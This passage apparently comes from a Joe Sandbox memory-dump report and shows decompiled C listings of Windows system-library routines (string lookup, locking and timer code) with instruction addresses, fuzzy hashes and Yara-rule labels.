							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E04629890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E045FEEF0(0x46d79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E045FEB70(0, 0x46d79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0xa02bc802
								_t13 = _t104 + 0xc; // 0xa02bbd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0461F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E045FEEF0(0x46d79a0);
									__eflags =  *0x46d8210 - _t104; // 0xa02bb0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x46d8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000a02b
											_t95 =  *((intOrPtr*)( *_t37));
											E04664888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E045FEB70(_t95, 0x46d79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E046295D0();
											L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E046295D0();
											L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E045FEB70(_t93, 0x46d79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E046295D0();
										L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E046295D0();
										L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000a02b
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0xa02bc802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0461F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x045e52a5
0x045e52ad
0x045e52b0
0x045e52b3
0x045e52b7
0x045e52ba
0x045e52bf
0x045e52c4
0x045e52cc
0x00000000
0x00000000
0x045e52ce
0x045e52d1
0x045e52d9
0x045e52dd
0x045e52e7
0x045e52f7
0x045e52f9
0x045e52fd
0x04640dcf
0x04640dd5
0x04640dd6
0x04640dd7
0x04640dd8
0x04640dd9
0x04640dde
0x04640ddf
0x04640de0
0x04640de1
0x04640de2
0x04640de2
0x04640de5
0x04640dea
0x04640dec
0x04640f60
0x04640f64
0x04640f70
0x04640f76
0x04640f79
0x04640f79
0x00000000
0x04640f64
0x04640df2
0x04640df7
0x04640e04
0x04640e04
0x04640e0d
0x04640e0d
0x04640e10
0x04640e1a
0x04640e1c
0x04640e4c
0x04640e52
0x04640e61
0x04640e67
0x04640e6b
0x04640e70
0x04640e76
0x04640ed7
0x04640edc
0x04640ee0
0x04640ee6
0x04640eea
0x04640eed
0x04640ef0
0x04640ef3
0x04640ef6
0x04640ef9
0x04640efb
0x04640efe
0x04640f01
0x04640f01
0x04640f0b
0x04640f12
0x04640f16
0x04640f18
0x04640f18
0x04640f1b
0x04640f2c
0x04640f31
0x04640f31
0x04640f35
0x04640f39
0x04640f3a
0x04640f3c
0x04640f3c
0x04640f3f
0x04640f50
0x04640f55
0x04640f55
0x04640f59
0x045e52eb
0x045e52f1
0x045e52f1
0x04640e7d
0x04640e84
0x04640e88
0x04640e8a
0x04640e8a
0x04640e8d
0x04640e9e
0x04640ea3
0x04640ea3
0x04640ea7
0x04640eaf
0x04640eb3
0x04640eb9
0x04640eb9
0x04640ebc
0x04640ecd
0x04640ecd
0x00000000
0x04640eb3
0x04640e1e
0x04640e21
0x04640e25
0x04640e2b
0x04640e2f
0x04640e30
0x04640e3a
0x04640e3f
0x04640e41
0x00000000
0x00000000
0x04640e47
0x00000000
0x04640e47
0x04640df9
0x04640dfe
0x00000000
0x00000000
0x00000000
0x04640dfe
0x045e5303
0x045e5307
0x00000000
0x045e5309
0x00000000
0x045e5309
0x045e5307
0x045e52e9
0x045e52e9
0x00000000
0x045e52e9
0x045e530e
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb34e3b40c8f9da4bed7263ae1519d97cb35d46a2292d7c6d59e49696e776d2
Instruction ID: ca73411700530ef0c42f54da14a81876fec33fe04510c92d709f0332a97d6935
Opcode Fuzzy Hash: 7cb34e3b40c8f9da4bed7263ae1519d97cb35d46a2292d7c6d59e49696e776d2
Instruction Fuzzy Hash: 4D51FC71205742ABE721EF64C845B2BBBE4FF80718F14492EE59587661FB70F804DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04612AE4 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04612AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x46d8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x46d8208; // 0x46d8207
				_t8 = _t57 + 0x46d8208; // 0x46d8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x46d8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x46d821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x46d6d5c; // 0x7f7d0654
							_t72 =  *0x46d6d5c; // 0x7f7d0654
							_t75 =  *0x46d6d5c; // 0x7f7d0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x46d6d5c; // 0x7f7d0654
							_t84 =  *0x46d6d5c; // 0x7f7d0654
							_t87 =  *0x46d6d5c; // 0x7f7d0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0462F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x04612ae4
0x04612aec
0x04612aef
0x04612af4
0x04612af7
0x04612afd
0x04612b92
0x04612b92
0x04612b97
0x04612b9c
0x04612b9c
0x04612b03
0x04612b06
0x04612b09
0x04612b09
0x04612b0f
0x04612b15
0x04612b15
0x04612b1b
0x04612b1e
0x04612b21
0x04612b26
0x04612b29
0x04612b81
0x04612b84
0x04612c0e
0x04612c15
0x04612c24
0x04612c24
0x04612b8a
0x04612b8a
0x04612b8a
0x04612b8a
0x04612b90
0x00000000
0x00000000
0x00000000
0x00000000
0x04612b4a
0x04612b4a
0x04612b4d
0x04612b53
0x00000000
0x00000000
0x04612b55
0x04612b58
0x04612bb7
0x04655d1b
0x04655d37
0x04655d47
0x04655d53
0x04612bbd
0x04612bbd
0x04612bbd
0x04612bb7
0x04612b5d
0x04612c2f
0x04655d5b
0x04655d77
0x04655d87
0x04655d93
0x04612c35
0x04612c35
0x04612c35
0x04612c2f
0x04612b65
0x04612b9f
0x04612ba2
0x04612b67
0x04612b67
0x04612b69
0x04612b6b
0x04612b6e
0x04612bc9
0x04612bcc
0x04612bcf
0x04612bd4
0x04612bd6
0x04612bd6
0x04612bdb
0x04612c02
0x04612c05
0x04612c07
0x00000000
0x04612c07
0x04612be0
0x04612c00
0x04612c3f
0x04612c3f
0x00000000
0x04612c00
0x04612be5
0x04612be7
0x04612bec
0x04612bf4
0x04612bf6
0x00000000
0x04612bf6
0x04612b70
0x04612b76
0x04612b2b
0x04612b2b
0x04612b2d
0x04612b2f
0x04612b32
0x04612b35
0x04612b3a
0x00000000
0x04612b40
0x04612b43
0x04612b45
0x04612b47
0x04612b4a
0x04612b4d
0x04612b53
0x00000000
0x00000000
0x00000000
0x04612b53
0x04612b78
0x04612b78
0x04612b7b
0x04612b7e
0x00000000
0x04612b7e
0x04612b76
0x04612ba5
0x04612ba5
0x04612ba8
0x04612bad
0x00000000
0x00000000
0x04612baf
0x04612baf
0x04612bc2
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f396299ea8ba158fbcc2e7fff968c77187ba8eded2a0a9ea9b4691ed5c5e5f4f
Instruction ID: e00c5ea62d2e53099e41245a21c1265b6e078ecca7f0e479188928ee924b18c1
Opcode Fuzzy Hash: f396299ea8ba158fbcc2e7fff968c77187ba8eded2a0a9ea9b4691ed5c5e5f4f
Instruction Fuzzy Hash: CF51B1B6B001158FCB18CF1CC8A09BDB7B1FB98704719859AE856AB364F734BE51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 046AAE44 Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E046AAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E046AC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E046AACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E046AFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E046AEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E04607D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E046A1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E046B1536(0x46d8ae4, (_t74 -  *0x46d8b04 >> 0x14) + (_t74 -  *0x46d8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L046AC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E046AA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0468CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E046AACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x046aae44
0x046aae4c
0x046aae53
0x046aae55
0x046aae5c
0x046aae64
0x046aae68
0x046aae75
0x046aae75
0x046aae78
0x046aae7a
0x046aae7c
0x046aae7f
0x046aaea8
0x046aaeab
0x046aaead
0x00000000
0x00000000
0x046aaeb3
0x046aaeb8
0x046aaebb
0x046aaebd
0x00000000
0x046aae81
0x046aae88
0x046aae8f
0x046aae9b
0x046aae96
0x046aae96
0x046aae96
0x046aaea0
0x046aaea3
0x046aaebf
0x046aaebf
0x046aaec3
0x046aaec9
0x046aaf0d
0x046aaf14
0x046aaf3d
0x046aaf3d
0x046aaf41
0x046aaf44
0x046aaf67
0x046aaf67
0x046aaf6a
0x046aafca
0x046aafd1
0x00000000
0x046aafd1
0x046aaf6c
0x046aaf6d
0x046aaf75
0x046aaf7c
0x046aaf7e
0x046aaf80
0x046aaf85
0x046aaf87
0x046aaf99
0x046aaf89
0x046aaf92
0x046aaf92
0x046aaf9e
0x046aafa1
0x046aafa3
0x046aafa9
0x046aafb0
0x046aafb2
0x046aafb4
0x046aafbc
0x046aafbc
0x046aafb4
0x046aafb0
0x00000000
0x046aafa1
0x046aaf4f
0x046aaf57
0x046aaf5c
0x046aaf5e
0x00000000
0x00000000
0x046aaf60
0x046aaf64
0x046aaf64
0x00000000
0x046aaf64
0x046aaf1a
0x046aaf25
0x00000000
0x00000000
0x046aaf27
0x046aaf28
0x046aaf33
0x00000000
0x046aaed0
0x046aaed0
0x046aaed2
0x046aaee1
0x046aaee4
0x00000000
0x00000000
0x046aaee6
0x046aaeec
0x00000000
0x00000000
0x046aaefb
0x046aaf07
0x046aafd3
0x046aafdb
0x046aafdb
0x00000000
0x046aaf07
0x046aaed6
0x046aaed8
0x046aaedf
0x00000000
0x00000000
0x00000000
0x046aaedf
0x046aaec9

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f0d2f3c16e744baff592263acdeb267fec1b8df132124d6f755937bd5650861
Instruction ID: 44341fe1b601cf1c95da60145e1692451beabf1324852748bd1e1540071c6b2e
Opcode Fuzzy Hash: 4f0d2f3c16e744baff592263acdeb267fec1b8df132124d6f755937bd5650861
Instruction Fuzzy Hash: A541D3B1700A115BDB2A9A69C894B7BB799AF94714F04421FF81687390F734FC21DE91

Uniqueness

Uniqueness Score: -1.00%

Function 0460DBE9 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0460DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E045ECC50(E045E4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E04607D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E046B8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E04602280(_t58, _v44);
						E0460DD82(_v44, _t102, _t98);
						E0460B944(_t102, _v5);
						return E045FFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x46d8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x46d862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x46d8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x46d862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x46afb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x0460dbe9
0x0460dbf2
0x0460dbf7
0x0460dbf9
0x0460dbfc
0x0460dc00
0x0460dc03
0x0460dc14
0x0460dd54
0x0460dd54
0x0460dd54
0x0460dc18
0x0460dc1d
0x0460dc1d
0x0460dc32
0x0460dc3b
0x0460dc3e
0x0460dc46
0x0460dd5b
0x0460dd62
0x0460dd64
0x0460dd67
0x0460dd69
0x0460dd6b
0x0460dd6e
0x0460dd70
0x0460dd73
0x0460dd73
0x00000000
0x0460dc4c
0x0460dc4e
0x04653ae3
0x04653ae8
0x04653aea
0x0460dce7
0x0460dce9
0x0460dcec
0x0460dcee
0x0460dcf0
0x0460dcf3
0x0460dcf5
0x04653af2
0x04653af5
0x04653af5
0x0460dd06
0x0460dd08
0x0460dd0b
0x0460dd12
0x04653b08
0x0460dd18
0x0460dd18
0x0460dd18
0x0460dd20
0x0460dd23
0x04653b16
0x04653b16
0x0460dd29
0x0460dd2d
0x0460dd36
0x0460dd40
0x0460dd51
0x0460dd51
0x0460dc54
0x0460dc59
0x0460dc59
0x0460dc5e
0x0460dc5e
0x0460dc63
0x0460dc66
0x0460dc6b
0x0460dc78
0x0460dc7b
0x0460dc81
0x0460dc81
0x0460dc83
0x0460dc89
0x00000000
0x00000000
0x0460dd7b
0x0460dd7b
0x0460dc8f
0x0460dc8f
0x0460dc92
0x0460dc99
0x0460dc9f
0x0460dca5
0x0460dcaa
0x0460dcaa
0x0460dcb3
0x0460dcb8
0x0460dcbb
0x0460dcc1
0x0460dccf
0x0460dcd2
0x0460dcd5
0x0460dcd7
0x0460dcda
0x0460dcdc
0x0460dcdc
0x0460dce2
0x0460dce4
0x00000000
0x0460dce4

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d8711145891c7eb4b1f9972198ad87ec40a48e28b264d6a76f8d246ae31bdc
Instruction ID: 1e9836fe11159f5d70dd2a4ac3c287a8a35a18b898bc631cccda9cfa6881ab51
Opcode Fuzzy Hash: 40d8711145891c7eb4b1f9972198ad87ec40a48e28b264d6a76f8d246ae31bdc
Instruction Fuzzy Hash: 7551B275A01605DFCB18CFA8C48069EBBF5FB48350F20865AD955A7384FB70BD84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 045FEF40 Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E045FEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E045E9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7738c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
